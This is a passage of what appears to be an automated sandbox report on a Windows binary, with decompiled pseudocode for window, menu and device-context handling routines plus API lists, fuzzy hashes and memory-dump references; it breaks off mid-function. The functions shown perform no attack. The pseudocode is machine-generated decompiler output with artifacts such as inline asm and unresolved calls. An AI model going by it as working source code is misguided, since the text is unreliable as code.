									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E004140D0(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044BD54(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00435E34( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x48e6ec; // 0x48fbfc
								E004594D8( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E004140D0(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044BD54(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044C654(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E004140D0(_v8, _t370);
								_t181 = E0044BDF4( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044BD54(E004140D0(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041F908(0, 1);
								_push(_t377);
								_push(0x44cdca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44cdad);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E004202C4(_v24,  *(_v40 + 0x18));
								E00420140(_v24);
								E0044D23C(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44cdb4);
								__eflags = 0;
								E004202C4(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044BD54(E004140D0(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406F30();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041F908(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E004202C4(_v24, _v32);
									E00420140(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44cecb, _t377,  *[fs:eax], 0x44cee8, _t377,  *[fs:eax], 0x44cf0d, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44ced2);
									__eflags = 0;
									E004202C4(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E004140D0(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044BD54(E004140D0(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E004140D0(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044BD84(E004140D0(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E004140D0(_v8, _t373);
											__eflags = 0;
											_t257 = E0044BD84(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x48e838; // 0x48fc00
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x48e838; // 0x48fc00
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x48e6ec; // 0x48fbfc
												E00459174( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E004591DC();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406D08();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44cf9e);
								return E00404320( &_v52);
							}
						}
					}
				}
				L69:
			}

0x0044ca65
0x0044ca67
0x0044ca6f
0x0044ca72
0x0044ca74
0x0044ca79
0x0044ca7a
0x0044ca7f
0x0044ca82
0x0044ca85
0x0044ca87
0x0044ca8c
0x0044caae
0x0044caae
0x0044cab3
0x0044cb02
0x0044cb03
0x0044cb05
0x00000000
0x0044cb0b
0x0044cb0b
0x0044cb0c
0x0044cb0c
0x0044cb0e
0x0044cb1b
0x0044cb20
0x0044cb22
0x00000000
0x00000000
0x0044cb28
0x0044cb29
0x0044cb29
0x0044cb2a
0x00000000
0x0044cb2c
0x00000000
0x0044cb2c
0x00000000
0x0044cb2a
0x0044cb0e
0x0044cab5
0x0044cab5
0x0044cab5
0x0044cab8
0x0044cb31
0x0044cb35
0x0044cb39
0x0044cb3b
0x0044cb3b
0x0044cb45
0x0044cb46
0x0044cb48
0x0044cbbe
0x0044cbbe
0x0044cbc7
0x00000000
0x0044cb4a
0x0044cb4a
0x0044cb4b
0x0044cb4b
0x0044cb4d
0x0044cb4d
0x0044cb51
0x0044cb77
0x0044cb53
0x0044cb53
0x0044cb56
0x0044cb58
0x0044cb6a
0x0044cb5a
0x0044cb65
0x0044cb65
0x0044cb58
0x0044cb7f
0x0044cb84
0x0044cb8f
0x0044cb92
0x0044cb96
0x00000000
0x00000000
0x0044cbba
0x0044cbbb
0x0044cbbb
0x0044cbbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044cbbc
0x0044cba1
0x0044cba9
0x0044cbb0
0x0044cbb0
0x0044caba
0x0044caba
0x0044cabb
0x0044cf24
0x0044cf25
0x0044cf27
0x00000000
0x0044cf29
0x0044cf29
0x0044cf2a
0x0044cf2a
0x0044cf2c
0x0044cf36
0x0044cf3e
0x0044cf41
0x0044cf44
0x00000000
0x00000000
0x0044cf4e
0x0044cf53
0x0044cf55
0x0044cf63
0x0044cf64
0x0044cf64
0x0044cf65
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044cf55
0x0044cf5c
0x0044cf5c
0x0044cac1
0x00000000
0x0044cac1
0x0044cabb
0x0044cab8
0x00000000
0x0044ca8e
0x0044ca8e
0x0044cacc
0x0044cacd
0x0044cacf
0x00000000
0x0044cad5
0x0044cad5
0x0044cad6
0x0044cad6
0x0044cad8
0x0044cadd
0x0044cae6
0x0044caeb
0x0044caed
0x00000000
0x00000000
0x0044caf3
0x0044caf4
0x0044caf4
0x0044caf5
0x00000000
0x0044caf7
0x00000000
0x0044caf7
0x00000000
0x0044caf5
0x0044cad8
0x00000000
0x0044ca90
0x0044ca90
0x0044ca93
0x0044ccd6
0x0044ccdf
0x0044cce0
0x0044cce2
0x00000000
0x0044cce8
0x0044cce8
0x0044cce9
0x0044cce9
0x0044cceb
0x0044cd02
0x0044cd05
0x0044cd09
0x00000000
0x00000000
0x0044cdd1
0x0044cdd2
0x0044cdd2
0x0044cdd3
0x00000000
0x0044cdd9
0x00000000
0x0044cdd9
0x00000000
0x0044cdd3
0x0044cd1b
0x0044cd20
0x0044cd21
0x0044cd26
0x0044cd29
0x0044cd38
0x0044cd3d
0x0044cd3e
0x0044cd43
0x0044cd46
0x0044cd52
0x0044cd67
0x0044cd80
0x0044cd87
0x0044cd8a
0x0044cd8d
0x0044cd92
0x0044cd97
0x0044cdac
0x0044cdac
0x0044ca99
0x0044ca99
0x0044ca9a
0x0044cde1
0x0044cdea
0x0044cdeb
0x0044cded
0x00000000
0x0044cdf3
0x0044cdf3
0x0044cdf4
0x0044cdf4
0x0044cdf6
0x0044ce0d
0x0044ce10
0x0044ce14
0x00000000
0x00000000
0x0044cf14
0x0044cf15
0x0044cf15
0x0044cf16
0x00000000
0x0044cf1c
0x00000000
0x0044cf1c
0x00000000
0x0044cf16
0x0044ce1d
0x0044ce21
0x0044ce26
0x0044ce34
0x0044ce43
0x0044ce51
0x0044ce5d
0x0044ce6b
0x0044ce74
0x0044ce89
0x0044cea3
0x0044cea8
0x0044ceab
0x0044ceae
0x0044ceb3
0x0044ceb8
0x0044ceca
0x0044ceca
0x0044caa0
0x0044caa3
0x0044cbd4
0x0044cbdd
0x0044cbde
0x0044cbe0
0x00000000
0x0044cbe6
0x0044cbe6
0x0044cbe7
0x0044cbe7
0x0044cbe9
0x0044cbf5
0x0044cbf8
0x0044cbfb
0x0044cbfe
0x0044cc29
0x0044cc00
0x0044cc0d
0x0044cc0d
0x0044cc2c
0x0044cc30
0x00000000
0x00000000
0x0044ccc6
0x0044ccc7
0x0044ccc7
0x0044ccc8
0x00000000
0x0044ccce
0x00000000
0x0044ccce
0x00000000
0x0044ccc8
0x0044cc48
0x0044cc4d
0x0044cc4f
0x0044cc56
0x0044cc61
0x0044cc63
0x0044cc63
0x0044cc68
0x0044cc70
0x0044cc73
0x0044cc75
0x0044cc7b
0x0044cc7d
0x0044cc84
0x0044cc84
0x0044cc8a
0x0044cc90
0x0044cc97
0x0044ccb3
0x0044ccbc
0x0044cc99
0x0044cca9
0x0044cca9
0x0044cc97
0x0044cc75
0x0044caa9
0x0044cf67
0x0044cf6a
0x0044cf6e
0x0044cf71
0x0044cf75
0x0044cf78
0x0044cf79
0x0044cf7e
0x0044cf7e
0x0044cf81
0x0044cf83
0x0044cf86
0x0044cf89
0x0044cf96
0x0044cf96
0x0044ca9a
0x0044ca93
0x0044ca8e
0x00000000

APIs

SaveDC.GDI32(?), ref: 0044CD33
RestoreDC.GDI32(?,?), ref: 0044CDA7
72E7B080.USER32(?,00000000,0044CF97), ref: 0044CE21
SaveDC.GDI32(?), ref: 0044CE58
RestoreDC.GDI32(?,?), ref: 0044CEC5
NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044CF97), ref: 0044CF79

Strings

p=C, xrefs: 0044CD11, 0044CE39

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$B080NtdllProc_Window
String ID: p=C
API String ID: 4024241980-781052374
Opcode ID: ecd796a03a1bf8d7f912e6def723b700ee3b50c9dbf1fa4703c2640c3da3a0ac
Instruction ID: ad9c4c5a1cd1ba46cc1a51c0c8274d556f72b6c48cdc2387c30b37844363018f
Opcode Fuzzy Hash: ecd796a03a1bf8d7f912e6def723b700ee3b50c9dbf1fa4703c2640c3da3a0ac
Instruction Fuzzy Hash: 13E18D74A016099FEB50DF6AC4C199EF7F6EF58304B2885AAE804E7361C738ED45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043F680, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043F680(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00438310(_t43);
			}

0x0043f683
0x0043f686
0x0043f696
0x0043f6c5
0x0043f698
0x0043f698
0x0043f6ac
0x0043f6b7
0x0043f6b8
0x0043f6b9
0x0043f6ba
0x0043f6ba
0x0043f6dd
0x0043f6ed
0x0043f6f1
0x0043f6f5
0x0043f700
0x0043f700
0x0043f6f1
0x0043f708
0x0043f70f
0x0043f719
0x0043f724
0x0043f734

APIs

IsIconic.USER32 ref: 0043F68F
GetWindowPlacement.USER32(?,0000002C), ref: 0043F6AC
GetWindowRect.USER32 ref: 0043F6C5
GetWindowLongA.USER32 ref: 0043F6D3
GetWindowLongA.USER32 ref: 0043F6E8
ScreenToClient.USER32 ref: 0043F6F5
ScreenToClient.USER32 ref: 0043F700

Strings

,, xrefs: 0043F698

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: a12820155725a039876d4d8ccf419126c5743c9484ca125d043eaefec602398f
Instruction ID: 5ed748699de712c2db3d41d7aa240e43a43ddff179b1e4222cd5d2224f105c8f
Opcode Fuzzy Hash: a12820155725a039876d4d8ccf419126c5743c9484ca125d043eaefec602398f
Instruction Fuzzy Hash: B1118E71904201ABCB01EF6DC885A8B77D8AF4D354F044A3EFD58DB386EB39D9048B66

Uniqueness

Uniqueness Score: -1.00%

Function 00452548, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00452548(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				struct HDC__* _t184;
				intOrPtr* _t207;
				intOrPtr _t232;
				intOrPtr _t238;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				intOrPtr* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t207 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t263 = _t92 - 0x46;
				if(_t263 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037B0(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037B0(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t116 = _v8;
						_t232 =  *0x452978; // 0x1
						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x452974);
						if(_t232 == ( *(_t116 + 0x1c) &  *0x452974)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x471b18;
							if( *0x471b18 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t255 = E0043F370(_t138);
												}
											}
										} else {
											_t141 = E00452DA8(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t255 = E0043F370(E00452DA8(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0044BD54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041F908(0, 1);
											_push(_t258);
											_push(0x4527be);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x4527a1);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E004202C4(_v16,  *(_v24 + 0x18));
											E00420140(_v16);
											E0044D23C(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x4527a8);
											__eflags = 0;
											E004202C4(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t256 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t256 - 1;
									if( *_t256 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0044BD54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t184 = E0043F370(_v8);
												L00406F30();
												_v20 = _t184;
												 *[fs:eax] = _t261;
												_v16 = E0041F908(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E004202C4(_v16, _v20);
												E00420140(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x4528a8, _t258,  *[fs:eax], 0x4528c5, _t258,  *[fs:eax], 0x4528ec, _t258, _t184);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x4528af);
												__eflags = 0;
												E004202C4(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 =  *_t207 -  *0x48fc08; // 0xc075
									if(_t267 == 0) {
										E00439EA4(_v8, 0, 0xb025, 0);
										E00439EA4(_v8, 0, 0xb024, 0);
										E00439EA4(_v8, 0, 0xb035, 0);
										E00439EA4(_v8, 0, 0xb009, 0);
										E00439EA4(_v8, 0, 0xb008, 0);
										E00439EA4(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E0043CE20(_v8, _t207);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}

0x00452549
0x0045254b
0x00452551
0x00452553
0x00452556
0x00452558
0x0045255b
0x00452580
0x00452580
0x00452585
0x00452631
0x00452638
0x00452645
0x00452645
0x0045258b
0x0045258b
0x0045258c
0x00452610
0x00452617
0x00452624
0x00452624
0x0045258e
0x00000000
0x0045258e
0x0045258c
0x00000000
0x0045255d
0x0045255d
0x0045264f
0x0045265d
0x00452664
0x00452667
0x0045266d
0x00452677
0x00452679
0x0045267b
0x0045267e
0x00452685
0x00452687
0x0045268a
0x0045268a
0x0045268a
0x0045268a
0x00452685
0x00452697
0x00452697
0x00452699
0x004526a3
0x004526ac
0x004526ac
0x004526ae
0x004526b8
0x004526bb
0x004526b0
0x004526b0
0x004526b2
0x00000000
0x00000000
0x004526b2
0x0045269b
0x0045269b
0x0045269d
0x00000000
0x00000000
0x0045269d
0x00452699
0x00000000
0x00452563
0x00452566
0x00452569
0x00452593
0x0045259a
0x004525a0
0x004525a3
0x00000000
0x004525a9
0x004525a9
0x004525ac
0x004525b0
0x00000000
0x004525b6
0x004525b6
0x004525b8
0x004525bb
0x004525c2
0x004525e4
0x004525ea
0x004525ec
0x004525ee
0x004525f1
0x004525f8
0x004525f8
0x004525f1
0x004525c4
0x004525c7
0x004525cc
0x004525ce
0x004525dd
0x004525dd
0x004525ce
0x004525fa
0x004525fc
0x00000000
0x00452602
0x00452603
0x00452603
0x004525fc
0x004525b0
0x004525a3
0x00000000
0x0045256b
0x0045256b
0x0045256e
0x004526c7
0x004526cd
0x004526d0
0x00000000
0x004526d6
0x004526d6
0x004526d9
0x004526e0
0x00000000
0x004526e6
0x004526fc
0x004526fe
0x00452700
0x00000000
0x00452706
0x00452712
0x00452717
0x00452718
0x0045271d
0x00452720
0x0045272f
0x00452734
0x00452735
0x0045273a
0x0045273d
0x00452749
0x0045275c
0x00452774
0x0045277b
0x0045277e
0x00452781
0x00452786
0x0045278b
0x004527a0
0x004527a0
0x00452700
0x004526e0
0x00452574
0x00452575
0x004527c5
0x004527c8
0x004527cb
0x00000000
0x004527d1
0x004527d1
0x004527d4
0x004527db
0x00000000
0x004527e1
0x004527f4
0x004527f6
0x004527f8
0x00000000
0x004527fe
0x00452801
0x00452807
0x0045280c
0x0045281a
0x00452829
0x00452837
0x00452843
0x00452851
0x0045285a
0x0045286d
0x00452880
0x00452885
0x00452888
0x0045288b
0x00452890
0x00452895
0x004528a7
0x004528a7
0x004527f8
0x004527db
0x0045257b
0x004528f3
0x004528f5
0x004528fb
0x00452909
0x0045291a
0x0045292b
0x0045293c
0x0045294d
0x0045295e
0x0045295e
0x00452963
0x00452968
0x0045296d
0x00452973
0x00452973
0x00452575
0x0045256e
0x00452569
0x0045255d

APIs

SetFocus.USER32(00000000), ref: 00452603
SaveDC.GDI32(?), ref: 0045272A
RestoreDC.GDI32(?,?), ref: 0045279B
72E7B080.USER32(00000000), ref: 00452807
SaveDC.GDI32(?), ref: 0045283E
RestoreDC.GDI32(?,?), ref: 004528A2

Strings

p=C, xrefs: 00452708, 0045281F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$B080Focus
String ID: p=C
API String ID: 809140284-781052374
Opcode ID: c8e5d820128f35a17eaebf0df48eb3d56469817d5d770f31f2c97d5d6aa307bb
Instruction ID: 489ffc4e204c6dc215414bf0fa7de494ac8462d529e5455d1f5329be7db8c7a8
Opcode Fuzzy Hash: c8e5d820128f35a17eaebf0df48eb3d56469817d5d770f31f2c97d5d6aa307bb
Instruction Fuzzy Hash: B6B16074B00104EFCB14DF69C695AAE73F5EB0A705F5540A7E800AB362D7B8EE05DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004586A0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004586A0(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00457698( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043F370( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D08();
						}
					}
					_t26 =  *0x48e5b4; // 0x48fa94
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x48e5b4; // 0x48fa94
